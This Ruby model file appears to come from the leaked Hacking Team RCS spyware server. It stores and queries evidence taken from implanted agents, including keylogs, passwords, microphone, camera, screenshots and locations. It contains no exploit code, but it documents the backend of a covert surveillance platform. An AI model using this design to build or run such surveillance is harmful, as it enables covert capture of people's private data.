hackedteam/rcs-db
lib/rcs-db/db_objects/evidence.rb

require 'mongoid'
require 'rcs-common/trace'
require 'rcs-common/keywords'

require_relative '../shard'
require_relative '../position/proximity'
require_relative '../target_scoped'

class Evidence
  include Mongoid::Document
  include RCS::TargetScoped
  include RCS::DB::Proximity
  include RCS::Tracer
  extend RCS::Tracer

  TYPES = ["addressbook", "application", "calendar", "call", "camera", "chat", "clipboard", "device",
           "file", "keylog", "message", "mic", "money", "mouse", "password", "position", "print", "screenshot", "url"]

  STAT_EXCLUSION = ['filesystem', 'info', 'command', 'ip']

  field :da, type: Integer                      # date acquired
  field :dr, type: Integer                      # date received
  field :type, type: String
  field :rel, type: Integer, default: 0         # relevance (tag)
  field :blo, type: Boolean, default: false     # blotter (report)
  field :note, type: String
  field :aid, type: String                      # agent BSON_ID
  field :data, type: Hash
  field :kw, type: Array, default: []           # keywords for full text search

  after_create :create_callback
  before_destroy :destroy_callback

  index({type: 1}, {background: true})
  index({da: 1}, {background: true})
  index({dr: 1}, {background: true})
  index({aid: 1}, {background: true})
  index({rel: 1}, {background: true})
  index({blo: 1}, {background: true})
  index({kw: 1}, {background: true})

  index({'data.position' => "2dsphere"}, {background: true})

  shard_key :type, :da, :aid
  validates_presence_of :type, :da, :aid

  scope :positions, where(type: 'position')
  scope :stats_relevant, not_in(:type => STAT_EXCLUSION)

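  # after_create hook: increments the per-type evidence and dashboard counters on the
  # owning agent and its target, and the size/grid_size stats up to the operation.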
  def create_callback
    return if STAT_EXCLUSION.include? self.type
    agent = Item.find self.aid
    agent.stat.inc(:"evidence.#{self.type}", 1)
    agent.stat.inc(:"dashboard.#{self.type}", 1)
    agent.stat.inc(:size, self.data.to_s.length)
    agent.stat.inc(:grid_size, self.data[:_grid_size]) unless self.data[:_grid].nil?
    # update the target of this agent
    target = agent.get_parent
    target.stat.inc(:"evidence.#{self.type}", 1)
    target.stat.inc(:"dashboard.#{self.type}", 1)
    target.stat.inc(:size, self.data.to_s.length)
    target.stat.inc(:grid_size, self.data[:_grid_size]) unless self.data[:_grid].nil?
    # update the operation of this agent
    operation = target.get_parent
    operation.stat.inc(:size, self.data.to_s.length)
    operation.stat.inc(:grid_size, self.data[:_grid_size]) unless self.data[:_grid].nil?
  rescue Exception => e
    trace :error, "Cannot update statisting while creating evidence #{e.message}"
  end

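  # before_destroy hook: removes the associated GridFS binary (if any) and
  # decrements the evidence counters and size stats on agent, target and operation.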
  def destroy_callback
    unless self.data['_grid'].nil?
      RCS::DB::GridFS.delete(self.data['_grid'], agent.path.last.to_s) rescue nil
    end

    return if STAT_EXCLUSION.include? self.type
    agent = Item.find self.aid
    return unless agent
    agent.stat.inc(:"evidence.#{self.type}", -1)
    agent.stat.inc(:size, -self.data.to_s.length)
    agent.stat.inc(:grid_size, -self.data['_grid_size']) unless self.data['_grid'].nil?
    # update the target of this agent
    target = agent.get_parent
    target.stat.inc(:"evidence.#{self.type}", -1)
    target.stat.inc(:size, -self.data.to_s.length)
    target.stat.inc(:grid_size, -self.data['_grid_size']) unless self.data['_grid'].nil?
    # update the operation of this agent
    operation = target.get_parent
    operation.stat.inc(:size, -self.data.to_s.length)
    operation.stat.inc(:grid_size, -self.data['_grid_size']) unless self.data['_grid'].nil?
  rescue Exception => e
    trace :error, "Cannot update statisting while deleting evidence #{e.message}"
  end

  def target
    @target ||= Item.find(target_id)
  end

  def agent
    @agent ||= Item.find(aid)
  end

  def target_id
    # The class method #target_id is added by TargetScoped
    self.class.target_id
  end

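  # Screenshots, captured files and camera shots may contain readable text or a
  # face, so they are candidates for the OCR queue (see #enqueue).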
  def may_have_readable_text_or_face?
    type == 'screenshot' or (type == 'file' and data[:type] == :capture) or type == 'camera'
  end

  def translatable?
    %w[keylog chat clipboard message].include?(type)
  end

  def intelligence_relevant?
    %w[addressbook password position url].include?(type)
  end

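  # Dispatch a freshly stored evidence: connectors may discard it, otherwise it is
  # matched against the alerts, queued for OCR/translation/aggregation (license
  # permitting) and for intelligence, and a dashboard update is pushed.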
  def enqueue
    if LicenseManager.instance.check(:connectors)
      return if RCS::DB::ConnectorManager.process_evidence(target, self) == :discard
    end

    # check if there are matching alerts for this evidence
    RCS::DB::Alerting.new_evidence(self)

    # add to the ocr processor queue
    if LicenseManager.instance.check(:ocr) and may_have_readable_text_or_face?
      OCRQueue.add(target.id, id)
    end

    # add to the translation queue
    if LicenseManager.instance.check(:translation) and translatable?
      TransQueue.add(target.id, id)
      data[:tr] = "TRANS_QUEUED"
      save
    end

    # add to the aggregator queue
    if LicenseManager.instance.check(:correlation)
      add_to_aggregator_queue
    end

    add_to_intelligence_queue

    unless STAT_EXCLUSION.include?(type)
      Item.send_dashboard_push(agent, target, target.get_parent)
    end
  end

  def add_to_intelligence_queue
    IntelligenceQueue.add(target_id, id, :evidence) if intelligence_relevant?
  end

  def add_to_aggregator_queue
    AggregatorQueue.add(target_id, id, type)
  end

  def self.create_collection
    # ensure indexes
    create_indexes
    # enable sharding only if not enabled
    RCS::DB::Shard.set_key(collection, {type: 1, da: 1, aid: 1}) unless RCS::DB::Shard.sharded?(collection)
  end

  # Count the evidence, grouped by type.
  # Returns a hash like {"chat" => 3, "mic" => 0, ..., "position" => 42}
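  #
  # Usage sketch (target_id and agent_id below are hypothetical):
  #   Evidence.target(target_id).count_by_type('aid' => agent_id.to_s)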
  def self.count_by_type(where={})
    match = where.merge(stats_relevant.selector)
    group = {_id: '$type', count: {'$sum' => 1}}
    project = { _id: 0, type: '$_id', count: 1}

    results = collection.aggregate([{'$match' => match}, {'$group' => group}, {'$project' => project}])
    results = results.inject({}) { |h, val| h[val['type']] = val['count']; h }

    defaults = TYPES.inject({}) { |h, type| h[type.to_s] = 0; h }
    defaults.merge!(results)
  end

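  # Instantiate an evidence bound to the given target's collection
  # (the .target class method comes from RCS::TargetScoped).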
  def self.dynamic_new(target)
    target(target).new
  end

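  # Field-by-field copy of an evidence, used when moving evidence between
  # target collections (see .offload_move_evidence).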
  def self.deep_copy(src, dst)
    dst.da = src.da
    dst.dr = src.dr
    dst.aid = src.aid.dup
    dst.type = src.type.dup
    dst.rel = src.rel
    dst.blo = src.blo
    dst.data = src.data.dup
    dst.note = src.note.dup unless src.note.nil?
    dst.kw = src.kw.dup unless src.kw.nil?
  end

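  # Build the query used for report generation: the criteria produced by
  # common_filter, minus filesystem/info evidence, ordered by acquisition date.
  # A hypothetical call (names are illustrative):
  #   Evidence.report_filter('filter' => {'target' => target_id.to_s, 'type' => ['chat', 'call']})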
  def self.report_filter(params)

    filter, filter_hash, target = ::Evidence.common_filter params
    raise "Target not found" if filter.nil?

    # copy remaining filtering criteria (if any)
    filtering = Evidence.target(target[:_id]).not_in(:type => ['filesystem', 'info'])
    filter.each_key do |k|
      filtering = filtering.any_in(k.to_sym => filter[k])
    end

    query = filtering.where(filter_hash).order_by([[:da, :asc]])

    return query
  end

  def self.report_count(params)

    filter, filter_hash, target = ::Evidence.common_filter params
    raise "Target not found" if filter.nil?

    # copy remaining filtering criteria (if any)
    filtering = Evidence.target(target[:_id]).not_in(:type => ['filesystem', 'info'])
    filter.each_key do |k|
      filtering = filtering.any_in(k.to_sym => filter[k])
    end

    num_evidence = filtering.where(filter_hash).count

    return num_evidence
  end

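  # Like report_count, but restricted to the types that are relevant for stats.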
  def self.filtered_count(params)

    filter, filter_hash, target = ::Evidence.common_filter params
    raise "Target not found" if filter.nil?

    # copy remaining filtering criteria (if any)
    filtering = Evidence.target(target[:_id]).stats_relevant
    filter.each_key do |k|
      filtering = filtering.any_in(k.to_sym => filter[k])
    end

    num_evidence = filtering.where(filter_hash).count

    return num_evidence
  end

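  # Parse the 'filter' request parameter (JSON string or Hash) and split it into:
  # - filter:      the remaining per-field criteria, applied later with any_in
  # - filter_hash: the Mongoid selector (dates, agent, keywords, position, note)
  # - target:      the Item the evidence belongs to
  # Returns nil when the target cannot be found.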
  def self.common_filter(params)

    # filtering
    filter = {}
    filter = JSON.parse(params['filter']) if params.has_key? 'filter' and params['filter'].is_a? String
    # must duplicate here since we delete keys from the filter later, but the
    # original parameter must stay intact for subsequent calls
    filter = params['filter'].dup if params.has_key? 'filter' and params['filter'].is_a? Hash

    # if not specified, the date filter defaults to the last 24 hours
    filter['from'] = Time.now.to_i - 86400 if filter['from'].nil? or filter['from'] == '24h'
    filter['from'] = Time.now.to_i - 7*86400 if filter['from'] == 'week'
    filter['from'] = Time.now.to_i - 30*86400 if filter['from'] == 'month'
    filter['from'] = Time.now.to_i if filter['from'] == 'now'

    filter['to'] = Time.now.to_i if filter['to'].nil?

    # to remove a filter set it to 0
    filter.delete('from') if filter['from'] == 0
    filter.delete('to') if filter['to'] == 0

    filter_hash = {}

    # filter by target
    target = Item.where({_id: filter.delete('target')}).first
    return nil if target.nil?

    # filter by agent
    filter_hash[:aid] = filter.delete('agent') if filter['agent']

    # by default the date filter applies to the acquisition date (da)
    date = filter.delete('date')
    date ||= 'da'
    date = date.to_sym

    # date filters must be treated separately
    filter_hash[date.gte] = filter.delete('from') if filter.has_key? 'from'
    filter_hash[date.lte] = filter.delete('to') if filter.has_key? 'to'

    # custom filters for info
    if filter.has_key?('info')
      info = filter.delete('info')
      # backward compatibility
      info = [info].flatten.compact

      filter_for_keywords(info, filter_hash)
      filter_for_position(info, filter_hash)
    end

    # filter on note
    groups_of_words = filter.delete('note')
    # backward compatibility: a string may arrive (instead of an array)
    groups_of_words = [groups_of_words].flatten.compact
    # remove empty strings from the array
    groups_of_words = groups_of_words.select { |string| !string.blank? }

    if !groups_of_words.empty?
      filter_hash['$or'] ||= []
      filter_hash['$or'].concat groups_of_words.map { |words| {'kw' => {'$all' => words.keywords}} }
      regexp = groups_of_words.map { |words| "(#{words})"}.join('|')
      filter_hash['note'] = /#{regexp}/i
    end

    return filter, filter_hash, target
  end

  # Check if the first string of the "info" filter is in the form of
  # field_1:value_1,field_2:value_2,...,field_x:value_y
  def self.filter_info_has_key_values? info
    regexp = /^([a-zA-Z]+:[^\,]+(\,|\,\s|$))+$/
    info.size == 1 && info.first =~ regexp
  end

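  # Split a "key:value,key:value" string and yield each pair, lowercasing the
  # key ("to" is mapped to the underlying "rcpt" field).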
  def self.each_filter_key_value string
    key_values = string.split(',')
    key_values.each do |kv|
      key, value = kv.split(':').map(&:strip)
      key.downcase!

      next if value.blank?
      # special case for email (the field is called "rcpt" but presented as "to")
      key = 'rcpt' if key == 'to'
      yield(key, value) if block_given?
    end
  end

  # If the info array contains a string like "lon:40,lat:10,r:34" then it adds
  # a $near filter on the "data.position" attribute.
  def self.filter_for_position(info, filter_hash)
    return unless filter_info_has_key_values?(info)

    lat, lon, r = nil

    each_filter_key_value(info.first) do |k, v|
      lat = v if k == 'lat'
      lon = v if k == 'lon'
      r   = v if k == 'r'
    end

    return unless lat and lon

    filter_hash['geoNear_coordinates'] = [lon, lat].map(&:to_f)
    filter_hash['geoNear_accuracy'] = r.to_i if r
  end

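  # Turn the "info" filter into either per-field regexp matches (when it is a
  # key:value list) or a full text search on the kw keywords array.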
  def self.filter_for_keywords(info, filter_hash)
    if filter_info_has_key_values?(info)
      each_filter_key_value(info.first) do |k, v|
        # special case for $near search
        next if %w[lat lon r].include?(k)

        filter_hash["data.#{k}"] = Regexp.new("#{v}", Regexp::IGNORECASE)
        # add a keyword condition to reduce the number of scanned documents (nscanned)
        filter_hash[:kw.all] ||= v.keywords
      end
    elsif !info.empty?
      # otherwise we use it for full text search with keywords
      groups_of_words = info.map { |words|
        keywords = words.strip.keywords
        keywords.empty? ? [words] : keywords
      }

      filter_hash['$or'] ||= []
      filter_hash['$or'].concat groups_of_words.map { |words| {'kw' => {'$all' => words}} }
    end
  end

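  # Offloaded job: move all the evidence of an agent from one target collection to
  # another (deep copy plus GridFS transfer), re-enqueue it for aggregation and
  # intelligence, then recalculate the stats of both targets and their operations.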
  def self.offload_move_evidence(params)
    old_target = ::Item.find(params[:old_target_id])
    target = ::Item.find(params[:target_id])
    agent = ::Item.find(params[:agent_id])

    # moving an agent implies that all of its evidence is moved to another target,
    # so we have to remove all the aggregates created from that evidence on the old target
    Aggregate.target(old_target[:_id]).destroy_all(aid: agent[:_id].to_s)

    evidences = Evidence.target(old_target[:_id]).where(:aid => agent[:_id])

    total = evidences.count
    chunk_size = 500
    trace :info, "Evidence Move: #{total} to be moved for agent #{agent.name} to target #{target.name}"

    # move the evidence in chunks to prevent cursor expiration on mongodb
    until evidences.count == 0 do

      evidences = Evidence.target(old_target[:_id]).where(:aid => agent[:_id]).limit(chunk_size)

      # copy the evidence into the new target's collection
      evidences.each do |old_ev|
        # deep copy the evidence from one collection to the other
        new_ev = Evidence.dynamic_new(target[:_id])
        Evidence.deep_copy(old_ev, new_ev)

        # move the binary content
        if old_ev.data['_grid']
          bin = RCS::DB::GridFS.get(old_ev.data['_grid'], old_target[:_id].to_s)

          if bin
            new_ev.data['_grid'] = RCS::DB::GridFS.put(bin.read, {filename: agent[:_id].to_s}, target[:_id].to_s)
            new_ev.data['_grid_size'] = old_ev.data['_grid_size']
          end
        end

        # save the new one
        new_ev.save

        # add the evidence to the aggregator queue (aggregates must be recalculated in the new target)
        if LicenseManager.instance.check :correlation
          new_ev.add_to_aggregator_queue
        end

        new_ev.add_to_intelligence_queue if LicenseManager.instance.check(:intelligence)

        # delete the old one. NOTE CAREFULLY:
        # we use delete plus an explicit GridFS delete, since the destroy callback
        # would fail: the parent of the agent referenced by aid is already the new target
        old_ev.delete
        RCS::DB::GridFS.delete(old_ev.data['_grid'], old_target[:_id].to_s) unless old_ev.data['_grid'].nil?

        # yield for progress indication
        yield if block_given?
      end

      total = total - chunk_size
      trace :info, "Evidence Move: #{total} left to move for agent #{agent.name} to target #{target.name}" unless total < 0
    end

    # recalculate stats
    old_target.restat
    old_target.get_parent.restat
    target.restat
    target.get_parent.restat

    trace :info, "Evidence Move: completed for #{agent.name}"
  end


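  # Offloaded job: bulk-delete the evidence of a target (optionally restricted by
  # agent, relevance and date range), then recalculate the stats.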
  def self.offload_delete_evidence(params)

    conditions = {}

    target = ::Item.find(params['target'])

    if params['agent']
      agent = ::Item.find(params['agent'])
      conditions[:aid] = agent._id.to_s
    end

    conditions[:rel] = params['rel']

    date = params['date']
    date ||= 'da'
    date = date.to_sym
    conditions[date.gte] = params['from']
    conditions[date.lte] = params['to']

    trace :info, "Deleting evidence for target #{target.name} #{params}"

    Evidence.target(target._id.to_s).where(conditions).any_in(:rel => params['rel']).destroy_all

    trace :info, "Deleting evidence for target #{target.name} done."

    # recalculate the stats for each agent of this target
    agents = Item.agents.in(path: [target._id])
    agents.each {|a| a.restat }

    # recalculate for the target
    target.restat

    # recalculate for the operation
    target.get_parent.restat
  end
end